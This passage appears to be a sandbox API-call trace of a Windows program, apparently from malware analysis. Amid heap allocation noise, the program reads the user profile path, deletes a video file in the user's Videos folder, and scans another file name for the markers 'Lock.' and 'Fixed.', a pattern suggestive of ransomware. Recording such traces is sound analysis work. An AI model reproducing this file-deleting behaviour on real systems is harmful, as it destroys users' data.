(in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0258.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0258.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0258.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0258.492] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0258.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0258.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0258.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0258.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0258.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0258.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0258.493] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/EseSTJL.avi", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\EseSTJL.avi", lpFilePart=0x8bedfc*="EseSTJL.avi") returned 0x30 [0258.493] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0258.493] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\EseSTJL.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\esestjl.avi")) returned 0x20 [0258.493] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\EseSTJL.avi", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67138a0, ftCreationTime.dwHighDateTime=0x1d4d171, ftLastAccessTime.dwLowDateTime=0x30a77050, ftLastAccessTime.dwHighDateTime=0x1d4d19c, ftLastWriteTime.dwLowDateTime=0x30a77050, ftLastWriteTime.dwHighDateTime=0x1d4d19c, nFileSizeHigh=0x0, nFileSizeLow=0x7f8f, dwReserved0=0x18af, dwReserved1=0x4, cFileName="EseSTJL.avi", cAlternateFileName="")) returned 0xaa57a0 [0258.493] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\EseSTJL.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\esestjl.avi")) returned 1 [0258.494] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67138a0, ftCreationTime.dwHighDateTime=0x1d4d171, ftLastAccessTime.dwLowDateTime=0x30a77050, ftLastAccessTime.dwHighDateTime=0x1d4d19c, ftLastWriteTime.dwLowDateTime=0x30a77050, ftLastWriteTime.dwHighDateTime=0x1d4d19c, nFileSizeHigh=0x0, nFileSizeLow=0x7f8f, dwReserved0=0x18af, dwReserved1=0x4, cFileName="EseSTJL.avi", cAlternateFileName="")) returned 0 [0258.495] FindClose (in: hFindFile=0xaa57a0 | out: hFindFile=0xaa57a0) returned 1 [0258.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0258.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0258.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0258.495] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0258.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0258.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0258.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0258.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0258.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0258.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0258.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0258.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0258.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0258.496] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0258.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0258.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0258.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa760 [0258.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0258.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0258.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa8e0 [0258.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0258.496] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0258.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0258.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0258.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0258.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0258.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0258.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0258.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0258.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0258.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0258.496] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0258.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0258.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0258.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0258.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0258.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0258.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0258.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0258.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0258.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0258.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0258.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0258.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0258.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0258.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0258.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0258.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0258.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0258.497] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0258.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0258.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0258.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0258.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0258.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0258.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0258.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0258.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0258.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x62) returned 0x24202f0 [0258.498] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/EseSTJL.avi", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\EseSTJL.avi", lpFilePart=0x8bf658*="EseSTJL.avi") returned 0x30 [0258.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0258.498] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\EseSTJL.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\esestjl.avi")) returned 0xffffffff [0258.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0258.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0258.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0258.498] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0258.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0258.499] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0258.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0258.499] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0258.499] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0258.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0258.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0258.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0258.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0258.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0258.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0258.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0258.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0258.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0258.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0258.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0258.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0258.499] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EzPWeTUYQ0o54TxyD5.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0258.500] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zPWeTUYQ0o54TxyD5.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0258.500] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PWeTUYQ0o54TxyD5.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0258.500] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WeTUYQ0o54TxyD5.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0258.500] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eTUYQ0o54TxyD5.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0258.500] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TUYQ0o54TxyD5.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0258.500] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UYQ0o54TxyD5.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0258.500] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YQ0o54TxyD5.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0258.500] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Q0o54TxyD5.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0258.500] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0o54TxyD5.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0258.500] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o54TxyD5.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0258.500] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="54TxyD5.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0258.500] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4TxyD5.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0258.500] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TxyD5.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0258.500] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xyD5.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0258.500] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yD5.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0258.500] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D5.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0258.500] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5.mkv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0258.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0258.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0258.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0258.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0258.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0258.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0258.501] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0258.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0258.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0258.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0258.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0258.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0258.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0258.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0258.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0258.501] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0258.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0258.502] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0258.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0258.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x2e) returned 0x24b39d0 [0258.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0258.502] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EzPWeTUYQ0o54TxyD5.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0258.502] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zPWeTUYQ0o54TxyD5.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0258.502] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PWeTUYQ0o54TxyD5.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0258.502] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WeTUYQ0o54TxyD5.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0258.502] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eTUYQ0o54TxyD5.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0258.502] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TUYQ0o54TxyD5.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0258.502] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UYQ0o54TxyD5.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0258.502] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YQ0o54TxyD5.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0258.502] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Q0o54TxyD5.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0258.502] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0o54TxyD5.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0258.502] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o54TxyD5.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0258.502] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="54TxyD5.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0258.502] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4TxyD5.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0258.502] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TxyD5.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0258.503] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xyD5.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0258.503] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yD5.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0258.503] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D5.mkv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0258.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0258.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b3260 [0258.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0258.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3260 | out: hHeap=0x25c0000) returned 1 [0258.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0258.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0258.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0258.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0258.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0258.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0258.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0258.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0258.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0258.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0258.503] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0258.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0258.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0258.504] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0258.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0258.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0258.504] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0258.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0258.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0258.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0258.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1938 [0258.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0258.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0258.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0258.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0258.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0258.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0258.504] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0258.504] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0258.504] 